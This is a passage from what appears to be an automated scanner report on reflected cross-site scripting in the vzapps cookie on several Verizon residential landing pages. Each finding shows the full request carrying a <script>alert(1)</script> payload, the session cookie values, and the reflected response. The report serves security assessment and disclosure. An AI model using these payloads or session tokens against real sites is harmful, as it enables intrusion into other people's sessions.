Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/FlexView/FlexView HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXdbc66<script>alert(1)</script>a161582328c; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69170
Expires: Sat, 20 Nov 2010 02:22:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:22:19 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:22:18 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 02:22:18 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 02:22:18 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 02:22:18 GMT; path=/
Set-Cookie: ContextInfo_State=TXdbc66<script>alert(1)</script>a161582328c; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:22:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:22:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:22:18 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXDBC66<SCRIPT>ALERT(1)</SCRIPT>A161582328C </DIV>
...[SNIP]...

1.40. http://www22.verizon.com/Residential/Bundles/Landing/FlexView/FlexView [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/FlexView/FlexView

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 734d2'><script>alert(1)</script>71478d92c9c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/FlexView/FlexView HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX734d2'><script>alert(1)</script>71478d92c9c; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69174
Expires: Sat, 20 Nov 2010 02:22:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:22:18 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:22:18 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 02:22:18 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 02:22:18 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 02:22:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX734d2'><script>alert(1)</script>71478d92c9c; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:22:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:22:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:22:18 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX734D2'><SCRIPT>ALERT(1)</SCRIPT>71478D92C9C ' />
...[SNIP]...

1.41. http://www22.verizon.com/Residential/Bundles/Landing/fios_online_nat/fios_online_nat.html [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/fios_online_nat/fios_online_nat.html

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b7bbb'><script>alert(1)</script>a8309b1db80 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/fios_online_nat/fios_online_nat.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXb7bbb'><script>alert(1)</script>a8309b1db80; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67952
Expires: Sat, 20 Nov 2010 02:21:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:21:43 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:21:43 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 02:21:43 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 02:21:43 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 02:21:43 GMT; path=/
Set-Cookie: ContextInfo_State=TXb7bbb'><script>alert(1)</script>a8309b1db80; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:21:43 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:21:43 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:21:43 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB7BBB'><SCRIPT>ALERT(1)</SCRIPT>A8309B1DB80 ' />
...[SNIP]...

1.42. http://www22.verizon.com/Residential/Bundles/Landing/fios_online_nat/fios_online_nat.html [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/fios_online_nat/fios_online_nat.html

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 66472<script>alert(1)</script>8c87af660bb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/fios_online_nat/fios_online_nat.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX66472<script>alert(1)</script>8c87af660bb; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67948
Expires: Sat, 20 Nov 2010 02:21:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:21:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:21:44 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 02:21:44 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 02:21:44 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 02:21:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX66472<script>alert(1)</script>8c87af660bb; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:21:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:21:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:21:44 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX66472<SCRIPT>ALERT(1)</SCRIPT>8C87AF660BB </DIV>
...[SNIP]...

1.43. http://www22.verizon.com/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload be024'><script>alert(1)</script>c3830ac2f77 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXbe024'><script>alert(1)</script>c3830ac2f77; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 61767
Expires: Sat, 20 Nov 2010 02:24:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:24:52 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:24:52 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 02:24:52 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 02:24:52 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 02:24:52 GMT; path=/
Set-Cookie: ContextInfo_State=TXbe024'><script>alert(1)</script>c3830ac2f77; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:24:52 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:24:52 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:24:52 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXBE024'><SCRIPT>ALERT(1)</SCRIPT>C3830AC2F77 ' />
...[SNIP]...

1.44. http://www22.verizon.com/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload e9ca1<script>alert(1)</script>d1af892adfb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXe9ca1<script>alert(1)</script>d1af892adfb; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 61763
Expires: Sat, 20 Nov 2010 02:24:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:24:53 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:24:52 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 02:24:52 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 02:24:52 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 02:24:52 GMT; path=/
Set-Cookie: ContextInfo_State=TXe9ca1<script>alert(1)</script>d1af892adfb; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:24:52 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:24:52 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:24:52 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXE9CA1<SCRIPT>ALERT(1)</SCRIPT>D1AF892ADFB </DIV>
...[SNIP]...

1.45. http://www22.verizon.com/Residential/Bundles/Landing/hsi_online_natoff/hsi_online_natoff.html [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/hsi_online_natoff/hsi_online_natoff.html

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 47f66<script>alert(1)</script>f9d43cba20d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/hsi_online_natoff/hsi_online_natoff.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX47f66<script>alert(1)</script>f9d43cba20d; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68466
Expires: Sat, 20 Nov 2010 02:24:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:24:00 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:23:59 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 02:23:59 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 02:23:59 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 02:23:59 GMT; path=/
Set-Cookie: ContextInfo_State=TX47f66<script>alert(1)</script>f9d43cba20d; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:24:00 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:24:00 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:24:00 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX47F66<SCRIPT>ALERT(1)</SCRIPT>F9D43CBA20D </DIV>
...[SNIP]...

1.46. http://www22.verizon.com/Residential/Bundles/Landing/hsi_online_natoff/hsi_online_natoff.html [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/hsi_online_natoff/hsi_online_natoff.html

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f6cb1'><script>alert(1)</script>68c67b1ae7a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/hsi_online_natoff/hsi_online_natoff.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
